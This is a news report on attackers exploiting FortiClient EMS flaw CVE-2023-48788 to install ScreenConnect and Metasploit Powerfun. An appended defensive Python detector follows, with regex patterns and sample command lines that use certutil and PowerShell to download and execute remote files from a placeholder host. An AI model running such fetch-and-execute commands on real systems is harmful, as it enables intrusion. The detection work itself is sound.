Hackers exploit Fortinet flaw, deploy ScreenConnect and Metasploit in new campaign

April 17, 2024 | Pressroom | Web Application Vulnerabilities / Firewall


Cybersecurity researchers have discovered a new campaign that exploits a recently discovered security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.

The activity involves exploitation of CVE-2023-48788 (CVSS score: 9.3), a critical SQL injection flaw that could allow an unauthenticated attacker to execute unauthorized code or commands via specially crafted requests.

Cybersecurity firm Forescout is tracking the campaign under the codename Connect:fun, a name derived from its use of ScreenConnect and Powerfun for post-exploitation.


The intrusion targeted an unnamed media company that exposed its vulnerable FortiClient EMS device to the Internet shortly after the release of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.

In the following days, the unknown adversary was observed exploiting the flaw in unsuccessful attempts to download ScreenConnect and then install the remote desktop software using the msiexec utility.

However, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit’s Powerfun script and initiated a reverse connection to another IP address.


The attack chain involved SQL statements designed to download ScreenConnect from a remote domain ("ursketz[.]com") using certutil; the installer was then run via msiexec before connections were established with a command-and-control (C2) server.

There is evidence to suggest that the threat actor behind the campaign has been active since at least 2022, specifically targeting Fortinet equipment and using the Vietnamese and German languages in their infrastructure.

“The observed activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time elapsed between each attempt,” said security researcher Sai Molige.


“This is evidence that this activity is part of a specific campaign, rather than an exploit included in cyber criminals’ automated botnets. From our observations, it appears that the actors behind this campaign are not carrying out mass scans but choosing target environments equipped with VPN devices.”

Forescout said the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 involving the abuse of CVE-2023-48788 to download ScreenConnect and Atera.

Organizations are advised to apply patches provided by Fortinet to address potential threats, monitor suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.
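The tool-download chain described above (certutil fetching a remote file, msiexec installing it, PowerShell pulling a script and calling out) is exactly the kind of behaviour the monitoring advice in the previous paragraph aims at. The following is an added example, not Forescout's, Fortinet's or the article's own code: it scans process-creation records of the shape a Sysmon Event ID 1 or EDR feed produces, flags each individual step, and then correlates a certutil download followed by an msiexec install on the same host into a single chain finding. The record field names (`ts`, `host`, `cmdline`), the hostnames, the `download.invalid` domain, the time window and all sample events are constructed for the example and are not indicators from the article.

```python
"""Detection sketch for a certutil-download / msiexec-install / PowerShell-fetch chain.

Added example (assumed record layout and constructed sample data); not code from the
article, Forescout or Fortinet.
"""
import re
from datetime import datetime, timedelta

# Per-step indicators over the process command line. Names are this example's own.
STEP_PATTERNS = [
    # certutil being used to fetch something from a URL rather than to inspect local files
    ("certutil_download", re.compile(r"certutil(?:\.exe)?\b.*\bhttps?://", re.I)),
    # msiexec installing a package; on its own this is often benign (software deployment)
    ("msiexec_install", re.compile(r"msiexec(?:\.exe)?\b.*\.msi\b", re.I)),
    # PowerShell pulling content from the network for in-memory execution
    ("powershell_fetch", re.compile(
        r"powershell(?:\.exe)?\b.*(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)",
        re.I)),
]

# How long after a certutil download an msiexec install still counts as the same chain (assumed).
CHAIN_WINDOW = timedelta(minutes=30)

# Constructed sample records (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {"ts": "2024-03-25T10:01:12Z", "host": "EMS01",
     "cmdline": r"cmd.exe /c certutil -urlcache -split -f http://download.invalid/agent.msi C:\Windows\Temp\agent.msi"},
    {"ts": "2024-03-25T10:04:40Z", "host": "EMS01",
     "cmdline": r"msiexec.exe /i C:\Windows\Temp\agent.msi /quiet"},
    {"ts": "2024-03-25T10:20:05Z", "host": "EMS01",
     "cmdline": r"powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://download.invalid/p.ps1')"},
    # Benign-looking activity on another host: a package pushed from a file share, no download step.
    {"ts": "2024-03-25T09:15:00Z", "host": "WS07",
     "cmdline": r"msiexec.exe /i \\fileserver\deploy\office.msi /qn"},
    # Legitimate certutil use: hashing a local file, no URL involved.
    {"ts": "2024-03-25T09:16:00Z", "host": "WS07",
     "cmdline": r"certutil -hashfile C:\Users\admin\Downloads\setup.exe SHA256"},
]


def parse_ts(s):
    """Parse the ISO-8601 UTC timestamp used in the sample records."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def classify_event(cmdline):
    """Return the names of all step patterns that match this command line (may be empty)."""
    return [name for name, rx in STEP_PATTERNS if rx.search(cmdline)]


def flagged_events(events):
    """Single-event hits: (host, ts, steps) for every record that matches at least one step."""
    out = []
    for ev in events:
        steps = classify_event(ev["cmdline"])
        if steps:
            out.append((ev["host"], ev["ts"], steps))
    return out


def find_chains(events):
    """Per host, pair a certutil download with the first msiexec install that follows it
    within CHAIN_WINDOW. Records may arrive unordered; they are sorted by time first."""
    by_host = {}
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        steps = classify_event(ev["cmdline"])
        if steps:
            by_host.setdefault(ev["host"], []).append((parse_ts(ev["ts"]), steps, ev["ts"]))

    findings = []
    for host, hits in by_host.items():
        for i, (t1, s1, ts1) in enumerate(hits):
            if "certutil_download" not in s1:
                continue
            for t2, s2, ts2 in hits[i + 1:]:
                if t2 - t1 > CHAIN_WINDOW:
                    break  # hits are time-ordered, so nothing later can be inside the window
                if "msiexec_install" in s2:
                    findings.append({"host": host, "chain": "download_then_install",
                                     "start": ts1, "end": ts2})
                    break
    return findings


if __name__ == "__main__":
    for host, ts, steps in flagged_events(SAMPLE_EVENTS):
        print(f"{ts} {host}: {', '.join(steps)}")
    for f in find_chains(SAMPLE_EVENTS):
        print(f"CHAIN {f['chain']} on {f['host']} from {f['start']} to {f['end']}")
```

On the constructed sample the msiexec install on WS07 is reported as a single-step hit but produces no chain, while EMS01 yields one download-then-install chain; the PowerShell fetch on EMS01 is surfaced separately so that an analyst sees the later stage even when the installer step was missed. In production the same logic would be fed from Sysmon, an EDR export or a SIEM query rather than an in-memory list, and the window and patterns tuned to the environment's own software-deployment practices.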
